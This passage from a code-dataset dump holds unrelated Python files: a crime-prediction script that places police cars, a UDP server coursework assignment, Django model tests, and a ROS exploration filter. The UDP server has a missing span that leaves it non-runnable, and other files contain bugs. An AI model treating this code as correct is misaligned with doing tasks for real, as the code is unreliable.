\"SIDEWALK\", \"PARKING\", \"ALLEY\", \"VEHICLE\", \"STATION\",\n \"TRAIN\", \"BUS\", \"DRIVEWAY\", \"PARK\", \"PLATFORM\", \"LAND\", \"LOT\", \"ATM\", \"SITE\", \"TRANSPORTATION\",\n \"RAILROAD\", \"HIGHWAY\", \"WATERFRONT\", \"TAXICAB\", \"BRIDGE\", \"MACHINE\", \"NEWSSTAND\", \"FOREST\", \"CEMETARY\", \"TRACKS\"}\nin_public_str = {\"STORE\", \"RESTAURANT\", \"HOTEL\", \"HOSPITAL\", \"BANK\", \"FACILITY\",\n \"BAR\", \"WORSHIP\", \"CURRENCY\", \"AIRPORT\", \"GOVERNMENT\", \"SCHOOL\",\n \"DEALERSHIP\", \"LIBRARY\", \"WASH\", \"BARBERSHOP\", \"BOWLING ALLEY\", \"ABANDONED BUILDING\", \"SHOP\"\n ,\"THEATER\", \"CREDIT\", }\nin_private_str = {\"APARTMENT\", \"RESIDENCE\", \"OFFICE\", \"HOME\", \"CLUB\", \"FACTORY\", \"WAREHOUSE\",\n \"DAY CARE\", \"FEDERAL\", \"AIRCRAFT\", \"UNIVERSITY\", \"COLLEGE\", \"JAIL\", \"ARENA\", \"POOL\", \"KENNEL\",\n }\nNIGHT_MIN_X_CORD = 1092706.0\nNIGHT_MAX_X_CORD = 1205112.0\nNIGHT_MIN_Y_CORD = 1813910.0\nNIGHT_MAX_Y_CORD = 1951493.0\n\n# NIGHT_MIN_X_CORD = 1092706.0\n# NIGHT_MAX_X_CORD = 1205112.0\n# NIGHT_MIN_Y_CORD = 1813910.0\n# NIGHT_MAX_Y_CORD = 1951493.0\n\n\n\ndef send_police_cars(X):\n \"\"\"\n Upon given a date, the function learns from the given date and previous\n data and predicts where should we send 30 cars throughout the day in order\n to prevents as much crime as possible!\n :param X: Date in correct form.\n :return: List of 30 tuples of (x, y, time) spot and time to place a police\n car for 30 minutes.\n \"\"\"\n with open(\"model.pkl\", 'rb') as file:\n model = pickle.load(file)\n\n df = model.train_data\n original_date = X[:11]\n month, day, year = int(X[:2]), int(X[3:5]), int(X[6:10])\n df = df.loc[:, [\"X Coordinate\", \"Y Coordinate\", \"Date\"]]\n df.dropna(inplace=True)\n\n date_df = df[\"Date\"].apply(lambda x: x[:10])\n date_df = date_df.apply(lambda x: datetime.date(int(x[6:10]), int(x[0:2]), int(x[3:5])).weekday())\n time = df[\"Date\"].apply(lambda x: int(x[11:13]) if x[20:] == \"AM\" else int(x[11:13]) + 12)\n del df[\"Date\"]\n df = df.join(time)\n df.rename(columns={\"Date\": \"Time\"}, inplace=True)\n df = df.join(date_df)\n df.rename({\"Date\": \"Weekday\"}, axis=1, inplace=True)\n weekday = datetime.date(year, month, day).weekday()\n df = df[df[\"Weekday\"] == weekday]\n df.drop(\"Weekday\", inplace=True, axis=1)\n k_means = KMeans(30).fit(df.to_numpy())\n\n def fun(x):\n \"\"\"\n fun function - changes a numeric value to time with date prefix.\n \"\"\"\n x = str(x)\n i = x.find('.')\n if i == -1:\n x2 = \"00\"\n else:\n x2 = math.floor(float(x[2:]) * 60)\n if x2 >= 10:\n x2 -= 10\n x2 = str(x2)\n if len(x2) == 1:\n x2 = \"0\" + x2\n else:\n x2 = \"00\"\n x = x[:2]\n x1 = x\n x3 = \"00\"\n return original_date + x1 + \":\" + x2 + \":\" + x3\n\n time = np.array([fun(x) for x in k_means.cluster_centers_[:, -1]])\n xyt = k_means.cluster_centers_[:, : -1]\n time = time.reshape((30, 1))\n xyt = np.hstack((xyt, time))\n return list(map(tuple, xyt))\n\n\ndef preprocess(df):\n \"\"\"\n Pre-processes the given data, getting rid of unnecessary columns,\n as well as adjusts certain features and splits the data into 3\n based on the time of the day.\n :param df: The dataframe\n :return: 3 dataframes, each of samples corresponding to different\n times of the day (morning, noon and night).\n \"\"\"\n cols = df.columns\n if \"Unnamed: 0\" in cols:\n del df[\"Unnamed: 0\"]\n if \"Unnamed: 0.1\" in cols:\n del df[\"Unnamed: 0.1\"]\n del df[\"ID\"]\n del df[\"Case Number\"]\n del df[\"Year\"]\n del df[\"Updated On\"]\n del df[\"IUCR\"]\n del 
df[\"FBI Code\"]\n del df[\"Description\"]\n del df[\"Latitude\"]\n del df[\"Longitude\"]\n del df[\"Location\"]\n\n if \"Primary Type\" in cols:\n df.replace({\"Primary Type\": crimes_dict_rev}, inplace=True)\n\n outside = df[\"Location Description\"].to_frame()\n in_private = df[\"Location Description\"].to_frame()\n in_public = df[\"Location Description\"].to_frame()\n outside.rename(columns={\"Location Description\": \"out\"}, inplace=True)\n in_private.rename(columns={\"Location Description\": \"in_private\"}, inplace=True)\n in_public.rename(columns={\"Location Description\": \"in_public\"}, inplace=True)\n outside = outside.out.str.contains(\"|\".join(out_str)).to_frame()\n in_private = in_private.in_private.str.contains(\"|\".join(in_private_str)).to_frame()\n in_public = in_public.in_public.str.contains(\"|\".join(in_public_str)).to_frame()\n df = pd.concat([df, outside, in_private, in_public], axis=1)\n date_copy = df[\"Date\"].apply(lambda x: x[:10])\n phi_two = (2 * np.pi) / 7\n date_copy_two = date_copy.apply(lambda x: datetime.date(int(x[7:]), int(x[0:2]), int(x[3:5])).weekday())\n df[\"d1\"] = date_copy_two.apply(lambda x: np.cos(phi_two * x))\n df[\"d2\"] = date_copy_two.apply(lambda x: np.sin(phi_two * x))\n time_2 = df[\"Date\"].apply(lambda x: int(x[11:13]) + (int(x[14:16]) / 60) + (int(x[17:19]) / 3600))\n phi = (2 * np.pi) / 24\n df[\"X Time\"] = time_2.apply(lambda x: x * np.cos(phi))\n df[\"Y Time\"] = time_2.apply(lambda x: x * np.sin(phi))\n del df[\"Location Description\"]\n time = df[\"Date\"].apply(lambda x: int(x[11:13]) if x[20:] == \"AM\" else int(x[11:13]) + 12)\n del df[\"Date\"]\n df = df.join(time)\n df.rename(columns={\"Date\": \"Time\"}, inplace=True)\n morning = df[(df['Time'] >= 6) & (df['Time'] < 14)]\n noon = df[(df['Time'] >= 14) & (df['Time'] < 22)]\n night = df[((df['Time'] >= 22) & (df['Time'] <= 24) |\n (df['Time'] >= 0) & (df['Time'] < 6))]\n del morning[\"Time\"]\n del noon[\"Time\"]\n del night[\"Time\"]\n return morning, noon, night\n\n\ndef save_pickle():\n \"\"\"\n Creates a pickle file containing the class data fitted over a training\n data\n \"\"\"\n df = pd.read_csv(\"Dataset_crimes.csv\")\n df_extra = pd.read_csv(\"crimes_dataset_part2.csv\")\n df_extra.reset_index(drop=True, inplace=True)\n df = pd.concat([df, df_extra], axis=0)\n model = Bagger(df)\n pkl_filename = \"model.pkl\"\n with open(pkl_filename, 'wb') as file:\n pickle.dump(model, file)\n\n\ndef split(df: pd.DataFrame):\n \"\"\"\n Splits the dataframe into the features and the response vector\n :param df: The dataframe\n :return: Matrix X of features and vector y of the corresponding responses\n \"\"\"\n y = df[\"Primary Type\"]\n X = df.drop([\"Primary Type\"], axis=1)\n return X.to_numpy(), y.to_numpy()\n\n\ndef coordinate_update(df, df_nan, index, row, coordinate):\n \"\"\"\n Updates coordinates given the axis aren't present in the sample data\n :param df: The dataframe of the trained model with no NaN values\n :param df_nan: The dataframe of the test data\n :param index: The index of the sample in the df_nan\n :param row: The row itself of the index in df_nan\n :param coordinate: On which coordinate to operate\n :return: None\n \"\"\"\n if not pd.isnull(row[\"Block\"]):\n frame = df[df[\"Block\"] == row[\"Block\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n if not pd.isnull(row[\"Beat\"]):\n frame = df[df[\"Beat\"] == row[\"Beat\"]].reset_index()\n if frame.shape[0] != 
0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n if not pd.isnull(row[\"District\"]):\n frame = df[df[\"District\"] == row[\"District\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n if not pd.isnull(row[\"Ward\"]):\n frame = df[df[\"Ward\"] == row[\"Ward\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n if not pd.isnull(row[\"Community Area\"]):\n frame = df[df[\"Community Area\"] == row[\"Community Area\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n # Fall back to a uniform draw between the observed bounds of this coordinate\n df_nan.at[index, coordinate] = random.randint(int(df[coordinate].min()), int(df[coordinate].max()))\n\n\ndef beat_update(df, df_nan, index, row):\n \"\"\"\n Re-creates the Beat parameter in the case it's not given in the data\n :param df: The dataframe of the trained model with no NaN values\n :param df_nan: The dataframe of the test data\n :param index: The index of the sample in df_nan\n :param row: The row itself at that index of df_nan\n :return: None\n \"\"\"\n if not pd.isnull(row[\"District\"]):\n frame = df[df[\"District\"] == row[\"District\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Beat\"] = frame.at[random.randint(0, frame.shape[0] - 1), \"Beat\"]\n return\n if not pd.isnull(row[\"Ward\"]):\n frame = df[df[\"Ward\"] == row[\"Ward\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Beat\"] = frame.at[random.randint(0, frame.shape[0] -1), \"Beat\"]\n return\n if not pd.isnull(row[\"Community Area\"]):\n frame = df[df[\"Community Area\"] == row[\"Community Area\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Beat\"] = frame.at[random.randint(0, frame.shape[0] - 1), \"Beat\"]\n return\n df_c = df.copy()\n f1 = df_c[\"X Coordinate\"].apply(lambda x: str(x)[:3]).reset_index()\n f2 = df_c[\"Y Coordinate\"].apply(lambda y: str(y)[:3]).reset_index()\n df_c = df_c.reset_index()\n frame = df_c[(f1[\"X Coordinate\"] == str(df_nan.at[index, \"X Coordinate\"])[:3]) &\n (f2[\"Y Coordinate\"] == str(df_nan.at[index, \"Y Coordinate\"])[:3])].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Beat\"] = frame.at[random.randint(0, frame.shape[0] - 1), \"Beat\"]\n else:\n df_nan.at[index, \"Beat\"] = df.at[random.randint(0, df.shape[0] - 1), \"Beat\"]\n\n\ndef predict(X):\n \"\"\"\n Predicts the type of felony:\n 0: Battery, 1: Theft, 2: Criminal Damage, 3: Deceptive Practice, 4: Assault\n :param X: The features matrix\n :return: The predicted response vector, based on the given matrix X\n \"\"\"\n with open(\"model.pkl\", 'rb') as file:\n model = pickle.load(file)\n df = model.train_data # the original data\n df_X = pd.read_csv(X)\n # code to extract a random time:\n date = df[\"Date\"].apply(lambda x: int(x[11:13]) if x[20:] == \"AM\" else int(x[11:13]) + 12)\n hours = np.array(date.value_counts().index.tolist())\n hours[hours == 24] = 0\n weights = date.value_counts().to_numpy()\n weights = weights / weights.sum()\n arrest = df[\"Arrest\"].value_counts().to_numpy()\n arrest = arrest / arrest.sum()\n dom = df[\"Domestic\"].value_counts().to_numpy()\n dom = dom / dom.sum()\n\n # code to extract all rows with NaN\n df_nan = df_X[df_X.isnull().any(axis=1)]\n for index, row in df_nan.iterrows():\n if pd.isnull(row[\"Date\"]):\n r = random.choices(hours, 
weights, k=1)\n df_nan.at[index, \"Date\"] = \"1/1/2021 {}:00\".format(r[0])\n\n if pd.isnull(row[\"Location Description\"]):\n df_nan.at[index, \"Location Description\"] = \"OTHER\"\n\n if pd.isnull(row[\"Arrest\"]):\n r = random.choices([False, True], arrest)\n df_nan.at[index, \"Arrest\"] = r[0]\n\n if pd.isnull(row[\"Domestic\"]):\n r = random.choices([False, True], dom)\n df_nan.at[index, \"Domestic\"] = r[0]\n\n if np.isnan(row[\"X Coordinate\"]):\n coordinate_update(df, df_nan, index, row, \"X Coordinate\")\n\n if np.isnan(row[\"Y Coordinate\"]):\n coordinate_update(df, df_nan, index, row, \"Y Coordinate\")\n\n if pd.isnull(row[\"Beat\"]):\n beat_update(df, df_nan, index, row)\n\n if pd.isnull(row[\"District\"]):\n size = str(df_nan.at[index, \"Beat\"])\n df_nan.at[index, \"District\"] = int(size[:1]) if len(size) == 3 else int(size[:2])\n\n if pd.isnull(row[\"Ward\"]):\n frame = df[df[\"District\"] == df_nan.at[index, \"District\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Ward\"] = frame.at[random.randint(0, frame.shape[0] - 1), \"Ward\"]\n else:\n df_nan.at[index, \"Ward\"] = df.at[random.randint(0, df.shape[0] - 1), \"Ward\"]\n if pd.isnull(row[\"Community Area\"]):\n frame = df[df[\"Ward\"] == df_nan.at[index, \"Ward\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Community Area\"] = \\\n frame.at[random.randint(0, frame.shape[0] - 1), \"Community Area\"]\n else:\n df_nan.at[index, \"Community Area\"] = \\\n df.at[random.randint(0, df.shape[0] - 1), \"Community Area\"]\n\n df_X.loc[df_nan.index] = df_nan\n cols = df_X.columns\n if \"Primary Type\" in cols:\n del df_X[\"Primary Type\"]\n del df_X[\"Block\"]\n size = df_X.shape[0]\n df_X.insert(0, \"i\", np.arange(size))\n morning, noon, night = preprocess(df_X)\n morn_arr = morning[\"i\"].to_numpy()\n noon_arr = noon[\"i\"].to_numpy()\n night_arr = night[\"i\"].to_numpy()\n del morning[\"i\"]\n del noon[\"i\"]\n del night[\"i\"]\n morning = model.grid_for_test(morning, model.morn_x_max, model.morn_x_min, model.morn_y_max,\n model.morn_y_min, model.morning_grid)\n noon = model.grid_for_test(noon, model.noon_x_max, model.noon_x_min, model.noon_y_max,\n model.noon_y_min, model.noon_grid)\n night = model.grid_for_test(night, model.night_x_max, model.night_x_min, model.night_y_max,\n model.night_y_min, model.night_grid)\n final = np.zeros(size)\n if morning.shape[0] != 0:\n morn_final = model.morning_bagger.predict(morning)\n final[morn_arr] = morn_final\n if noon.shape[0] != 0:\n noon_final = model.noon_bagger.predict(noon)\n final[noon_arr] = noon_final\n if night.shape[0] != 0:\n night_final = model.night_bagger.predict(night)\n final[night_arr] = night_final\n return final\n\n\ndef create_files(path):\n \"\"\"\n Divides the data into 3 sets: Train, Validation and Test\n :param path: The path to the given file (in csv format)\n \"\"\"\n df = pd.read_csv(path)\n train = df.sample(frac=0.70)\n df = df.drop(train.index)\n test = df.sample(frac=0.10)\n valid = df.drop(test.index)\n test.to_csv(\"test.csv\")\n train.to_csv(\"train.csv\")\n valid.to_csv(\"validation.csv\")\n","sub_path":"task2/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":15054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"634089747","text":"#-------------------SOCKET PROGRAMMING-------------------\n#Creating the server application\n\nimport socket #Import the socket library for communication between the client and the server\nimport threading 
#Importojme librarine per thread-a\nimport random #Importojme librarine per marrjen e vlerave te rastesishme \nimport math #Importojme librarine per funksione matematikore \nimport re #Importojme librarine per regular expression (shprehje te rregullta)\nfrom datetime import datetime #Klasa datetime per daten dhe kohen \n\nserverName = '127.0.0.1' #IP \nserverPort = 14000 #Porti\naddress=(serverName,serverPort) #Adresa eshte qift i hostit dhe portit \n\n#Krijimi i soketit. Argumentet e pasuara ne socket () specifikojne familjen e adresave dhe llojin e soketit\n#AF_INET eshte familja e adresave per IPv4. SOCK_DGRAM eshte lloji i soketit per UDP protokollin\ntry:\n serverSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nexcept socket.error as err: #Nese ndodh gabim, shfaqet gabimi dhe mbyllet sistemi\n print(\"Soketi nuk ka mundur te krijohet!\") \n print(str(err))\n time.sleep(1)\n sys.exit()\n\ntry: #Serveri tenton te lidhet me klientin permes metodes bind(), ku si parameter e merr adresen(hosti,porti)\n serverSocket.bind(address)\n print(\"\\nServeri eshte startuar ne localhost ne portin \" + str(serverPort)+\".\")\n print(\"\\nServeri eshte duke punuar dhe eshte duke pritur per ndonje kerkese!\")\nexcept socket.error as err: #Nese ndodh gabim gjate lidhjes, shfaqet gabimi\n print(str(err))\n \ndef IP(): #Metoda IP kthen IP adresen e klientit\n return \"IP adresa e klientit eshte: \"+str(addr[0])\n\ndef NRPORTIT(): #Metoda NRPORTIT kthen portin e klientit\n return \"Klienti eshte duke perdorur portin: \"+str(addr[1])\n\ndef ANASJELLTAS(x): #Metoda ANASJELLTAS tekstin e dhene e kthen anasjelltas (reverse)\n x=re.sub(r\"^\\s+|\\s+$\", \"\", x)\n if len(x)==1 or len(x)==0:\n return \"Keni dhene vetem zbrazetira ose/dhe vetem nje karakter\"\n else:\n return \"Teksti i kthyer anasjelltas: \"+ x[::-1] \n \ndef PALINDROM(text): #Metoda PALINDROM tregon nese teksti shkruhet njejt ne te dyja anet, eshte palindrom\n text = re.sub(r'[^a-zA-Z]','',text)\n reversedText=text[::-1] \n if reversedText==text: \n return \"Teksti i dhene eshte palindrom.\"\n else: \n return \"Teksti i dhene nuk eshte palindrom.\"\n\ndef LOJA(): #Metoda LOJA kthen 5 numra te rastesishem dhe te sortuar nga 1-35\n listOfNumbers = []\n for number in range(0,5):\n number = random.randint(1,35)\n listOfNumbers.append(number) \n listOfNumbers.sort()\n return \"5 numra te plote dhe te sortuar, nga rangu 1-35:\\n\"+str(listOfNumbers)\n\ndef KOHA(): #Metoda KOHA kthen daten dhe kohen aktuale te serverit \n currDateTime=datetime.now()\n currDateTimeFormat=currDateTime.strftime(\"%d/%m/%Y, %H:%M:%S\")\n return \"Data dhe koha aktuale: \"+currDateTimeFormat\n \ndef NUMERO(text): #Metoda NUMERO kthen nr e zanoreve dhe bashketingelloreve te teksit te dhene \n text = re.sub(r'[^a-zA-Z]','',text)\n vowel=0\n constant=0\n for i in text: \n if i==\"a\" or i==\"e\" or i==\"i\" or i==\"o\" or i==\"u\" or i==\"y\"or i==\"A\" or i==\"E\" or i==\"I\" or i==\"O\" or i==\"U\" or i==\"Y\":\n vowel+=1 \n else: \n constant+=1\n return \"Teksti i dhene ka \"+ str(vowel)+ \" zanore dhe \"+str(constant)+\" bashketingellore\"\n \ndef GCF(num1,num2): #Metoda GCF kthen faktorin me te madh te perbashket te dy numrave \n if num1.isnumeric()==False or num2.isnumeric()==False:\n return \"Nuk keni dhene vetem dy numra valid!\"\n gcdResult=math.gcd(int(num1),int(num2))\n return \"Faktori me i madh i perbashket i dy numrave te dhene eshte: \"+str(gcdResult)\n\ndef KONVERTO(mode,number): #Metoda KONVERTO eshte nje lloj kalkulatori per disa konvertime \n \n 
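# NOTE: str.isnumeric() is False for decimal or negative input, so values like 2.5 or -3 take the invalid-number branch below.\n    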
if number.isnumeric()==False:\n return(\"Nuk keni dhene numer valid!\")\n if mode==\"cmNeInch\": \n converted=int(number)/2.54\n return \"Numri \"+str(number)+\" cm, i konvertuar ne inch= \"+str(round(converted, 3)) \n elif mode==\"inchNeCm\": \n converted=int(number)*2.54\n return \"Numri \"+str(number)+\" inch, i konvertuar ne cm= \"+str(round(converted, 3))\n elif mode==\"kmNeMiles\": \n converted=int(number)*0.621371\n return \"Numri \"+str(number)+\" km, i konvertuar ne milje= \"+str(round(converted, 3))\n elif mode==\"mileNeKm\": \n converted=int(number)/0.621371\n return \"Numri \"+str(number)+\" milje, i konvertuar ne km= \"+str(round(converted, 3))\n else:\n return \"Ky konvertim nuk ekziston!\"\n\ndef THENJA(): #Metoda THENJA kthen nje thenje te rastesishme nga nje varg i thenjeve\n quoteArray=[\"It's not the hours you put in your work that counts, it's the work you put in the hours.\"\n ,\"No one would have crossed the ocean if he could have gotten off the ship in the storm.\"\n ,\"Better to get hurt by the truth than comforted with a lie.\"\n ,\"There is only one sin. and that is theft... when you tell a lie, you steal someones right to the truth.\"\n ,\"It always hurts more to have and lose than to not have in the first place.\"\n ,\"A society has no chance of success if its women are uneducated...\"\n ,\"People say that eyes are windows to the soul.\"\n ,\"They say, Find a purpose in your life and live it. But, sometimes, it is only after you have lived that you recognize your life had a purpose, and likely one you never had in mind.\"\n ,\"A fool thinks himself to be wise, but a wise man knows himself to be a fool.\"\n ,\"If music be the food of love, play on.\"\n ,\"I raise up my voice�not so that I can shout, but so that those without a voice can be heard. � We cannot all succeed when half of us are held back.\"\n ,\"Feminism isn't about making women stronger. 
Women are already strong, it's about changing the way the world perceives that strength.\"\n ,\"Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.\"\n ,\"You only live once, but if you do it right, once is enough.\"]\n \n return \"Nje thenje e rastesishme: \"+random.choice(quoteArray)\n\ndef FIBONACCI(n): #Metoda FIBONACCI kthen sekuencen fibonacci per nr e termave te dhene \n def fibRecursion(n):\n if n==0 or n==1:\n return n \n else:\n return (fibRecursion(n-1)+fibRecursion(n-2)) \n n=re.sub(r\"^\\s+|\\s+$\", \"\", n)\n if n.isnumeric()==False:\n return (\"Nuk kemi dhene numer valid, prandaj nuk mund te gjenerohet sekuenca Fibonacci!\")\n elif int(n)<=0:\n return (\"Keni dhene numer negativ ose 0 prandaj nuk mund te gjenerohet sekuenca Fibonacci!\") \n i=0\n result=\"\"\n while i '+str(response)+\"\\n\")\n serverSocket.sendto(str.encode(response),addr)\n \nserverSocket.close() #Mbyllja e soket serverit \n","sub_path":"FIEK-UDP/UDPserver/UDPserver/UDPserver.py","file_name":"UDPserver.py","file_ext":"py","file_size_in_byte":11466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"192888205","text":"from django.test import TestCase\nfrom django.db.utils import IntegrityError\n\nfrom apps.core.models.slideshow import Slideshow\n\nfrom faker import Faker\n\nfactory = Faker(\"pt_BR\")\n\n\nclass SlideshowCreateTestCase(TestCase):\n \"\"\"\n Tests the slideshow creation units\n \"\"\"\n\n def setUp(self):\n pass\n\n def test_succeeds_on_creation_if_params_are_correct(self):\n self.assertIsNotNone(\n Slideshow.objects.create(\n title=factory.text(max_nb_chars=50),\n resume=factory.text(max_nb_chars=100),\n image=factory.file_path(extension=\"jpg\"),\n )\n )\n\n def test_fails_on_creation_if_already_exist(self):\n slideshow = Slideshow.objects.create(\n title=factory.text(max_nb_chars=50),\n resume=factory.text(max_nb_chars=100),\n image=factory.file_path(extension=\"jpg\"),\n )\n\n with self.assertRaises(IntegrityError):\n Slideshow.objects.create(\n title=slideshow.title, resume=slideshow.resume, image=slideshow.image\n )\n","sub_path":"apps/core/tests/slideshow.py","file_name":"slideshow.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"322061229","text":"#!/usr/bin/env python\n \n\n# --------Include modules---------------\nimport rospy\nimport tf\nfrom numpy import array, vstack, delete, floor, linalg\nfrom nav_msgs.msg import OccupancyGrid\nfrom geometry_msgs.msg import Point, PointStamped\nfrom rrt_exploration.msg import PointArray, PointStampedArray\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom sklearn.cluster import MeanShift\nfrom functions import gridValue\nfrom copy import copy\n\n\n\ndef informationRectangleGain(mapData, point, r):\n infoGain = 0\n index = (floor((point[1]-mapData.info.origin.position.y)/mapData.info.resolution)*mapData.info.width)+(floor((point[0]-mapData.info.origin.position.x)/mapData.info.resolution))\n \n r_region = int(r/mapData.info.resolution)\n init_index = index-r_region*(mapData.info.width+1)\n last_index = index+r_region*(mapData.info.width+1)\n length = 2*r_region\n start = int(init_index)\n end = start + int(length)\n if (last_index < len(mapData.data)):\n for n in range(0, 2*r_region+1):\n for i in range(start, end+1):\n if(mapData.data[i] == -1):\n infoGain += 1\n elif(mapData.data[i] == 100):\n infoGain -= 1\n start += mapData.info.width\n 
end += mapData.info.width\n else:\n for n in range(0, 2*r_region+1):\n for i in range(start, end+1):\n limit = ((start/mapData.info.width) + 2)*mapData.info.width # part of rectangle is outside the map\n if (i >= 0 and i < limit and i < len(mapData.data)):\n if(mapData.data[i] == -1):\n infoGain += 1\n elif(mapData.data[i] == 100):\n infoGain -= 1\n start += mapData.info.width\n end +=mapData.info.width\n\n return infoGain*(mapData.info.resolution**2)\n\n\n\nmerged_map = OccupancyGrid()\nmerged_costmap = OccupancyGrid()\nfrontiers = []\n\ndef mapCallBack(msg):\n global merged_map\n merged_map = msg\n\n\ndef costmapCallBack(msg):\n global merged_costmap\n merged_costmap = msg\n\n\ndef detectFrontiersCallBack(msg, args):\n global frontiers\n transformedPoint = args[0].transformPoint(args[1], msg)\n tempList = [transformedPoint.point.x, transformedPoint.point.y]\n frontiers.append(tempList)\n # rospy.loginfo(\"receive %d numeber of points\"%(len(frontiers)))\n\ndef node():\n global merged_costmap, merged_map, frontiers\n\n rospy.init_node(\"filter_jianming\", anonymous=False)\n \n # ---------------------- get params from ros server\n map_topic = rospy.get_param(\"~map_topic\",'map_merge/map')\n costmap_topic = rospy.get_param(\"~costmap_topic\",'map_merge/costmap')\n frontier_topic = rospy.get_param(\"~frontier_topic\", \"detected_points\")\n n_robots = rospy.get_param(\"~n_robots\", 1)\n rateHz = rospy.get_param(\"~rateHz\", 1)\n namespace = rospy.get_param(\"~namespace\", \"robot\")\n robot_frame = rospy.get_param(\"~robot_frame\",\"base_link\")\n info_radius = rospy.get_param(\"~info_radius\", 1.0)\n costmap_pixel_threshold = rospy.get_param(\"~costmap_pixel_threshold\", 40) # goals location with costmap data larger than threshold will be deleted\n\n # ---------------------- configure the nodes' params\n rate = rospy.Rate(rateHz)\n\n # ---------------------- subscribe to the map topics\n rospy.Subscriber(map_topic, OccupancyGrid, mapCallBack)\n rospy.Subscriber(costmap_topic, OccupancyGrid, costmapCallBack)\n \n # ---------------------- publish topics for robots assigner.\n dataFilteredPointPub = rospy.Publisher(\"filtered_points\", PointArray, queue_size=10)\n\n # ---------------------- publish topics for display\n # displayFrontiersPub = rospy.Publisher(\"frontiers\", Marker, queue_size=10)\n displayCentroidsPub = rospy.Publisher(\"centroids\", Marker, queue_size=10)\n\n # ---------------------- receive the topics from ros server.\n while(len(merged_map.data)==0 ):\n rospy.loginfo(\"waiting for the merged map\")\n continue\n\n while(len(merged_costmap.data)==0):\n rospy.loginfo(\"waiting for the merged costmap\")\n continue\n\n # ---------------------- initialize display Markers' params.\n display_centroids = Marker()\n\n display_centroids.type = Marker.POINTS\n display_centroids.header = merged_map.header\n display_centroids.action = Marker.ADD \n display_centroids.ns = \"points\"\n display_centroids.pose.orientation.w = 1\n display_centroids.scale.x = 0.2\n display_centroids.scale.y = 0.2\n display_centroids.color.r = 0 # 255/255\n display_centroids.color.g = 1 # 255/255\n display_centroids.color.b = 0 # 0 /255\n display_centroids.color.a = 1\n display_centroids.lifetime = rospy.Duration()\n\n # ---------------------- initialize transform.\n merge_map_frame = merged_map.header.frame_id\n tfLisn = tf.TransformListener()\n # robotsTransform = []\n if n_robots > 0:\n for i in range(0, n_robots):\n tfLisn.waitForTransform(merge_map_frame, namespace+str(i+1)+'/'+robot_frame, rospy.Time(0), 
rospy.Duration(10.0))\n # (trans, rot) = tfLisn.lookupTransform(namespace+str(i+1)+'/'+robot_frame, merge_map_frame, rospy.Time(0))\n # robotsTransform.append(copy(trans))\n elif n_robots == 1:\n tfLisn.waitForTransform(merge_map_frame, 'robot1/'+robot_frame, rospy.Time(0), rospy.Duration(10.0))\n # (trans, rot) = tfLisn.lookupTransform('robot1/'+robot_frame, merge_map_frame, rospy.Time(0))\n # robotsTransform.append(copy(trans))\n\n # ---------------------- subscribe to the detected points.\n rospy.Subscriber(frontier_topic, PointStamped, callback=detectFrontiersCallBack, callback_args=[tfLisn, merge_map_frame] )\n\n # ---------------------- initialize the temporary vars.\n tempPointStamp = PointStamped()\n tempPointStamp.header.frame_id = merged_map.header.frame_id\n tempPointStamp.header.stamp = rospy.Time(0)\n tempPointStamp.point.z = 0.0\n \n tempPointArray = PointArray()\n\n #-------------------------------------------------------------------------\n #--------------------- Main Loop -------------------------------\n #-------------------------------------------------------------------------\n while not rospy.is_shutdown():\n if(len(frontiers) == 0):\n rate.sleep()\n continue\n \n # ---------------------- cluster the frontiers into several centers.\n if(len(frontiers)>1):\n # frontiers_copy = frontiers\n ms = MeanShift(bandwidth=0.6) # bandwidth determines the cluster radius\n ms.fit(frontiers)\n centroids = ms.cluster_centers_\n elif(len(frontiers)==1):\n centroids = frontiers\n # rospy.loginfo(\"detect %d points\"%len(centroids))\n\n # ---------------------- display detected centroids.\n # for item in centroids:\n # rospy.loginfo(\"centroids after cluster: location %3.2f, %3.2f\"%(item[0], item[1]))\n\n # ---------------------- remove centroids whose distances to obstacle < radius of robots.\n # ---------------------- remove old centroids which have been explored. 
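\n        # NOTE: the loop below reuses the name index for both the centroid counter and the flattened costmap cell offset, so the counter is clobbered on every pass and delete() can drop the wrong centroid row; giving the offset its own name such as cell_index would be the minimal fix.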
\n index = 0\n # rospy.loginfo(\"filter.py start transform loop: %s\"%rospy.get_rostime())\n while index < len(centroids):\n tempPointStamp.point.x = centroids[index][0]\n tempPointStamp.point.y = centroids[index][1]\n tempTransformedPoint = tfLisn.transformPoint(merged_costmap.header.frame_id, tempPointStamp)\n # avoid robots hit the walls\n index = (floor((tempTransformedPoint.point.y-merged_costmap.info.origin.position.y)/merged_costmap.info.resolution)*merged_costmap.info.width) + (floor((tempTransformedPoint.point.x-merged_costmap.info.origin.position.x)/merged_costmap.info.resolution))\n condition = merged_costmap.data[int(index)] > costmap_pixel_threshold \n # delete old frontiers which have been explored\n condition = (informationRectangleGain(merged_map, [tempPointStamp.point.x, tempPointStamp.point.y], info_radius) < 0.5) or condition\n if(condition):\n centroids = delete(centroids, index, axis=0)\n index = index - 1\n index+=1\n rospy.loginfo(\"remain %d points after delete\"%len(centroids))\n # rospy.loginfo(\"filter.py after transform loop: 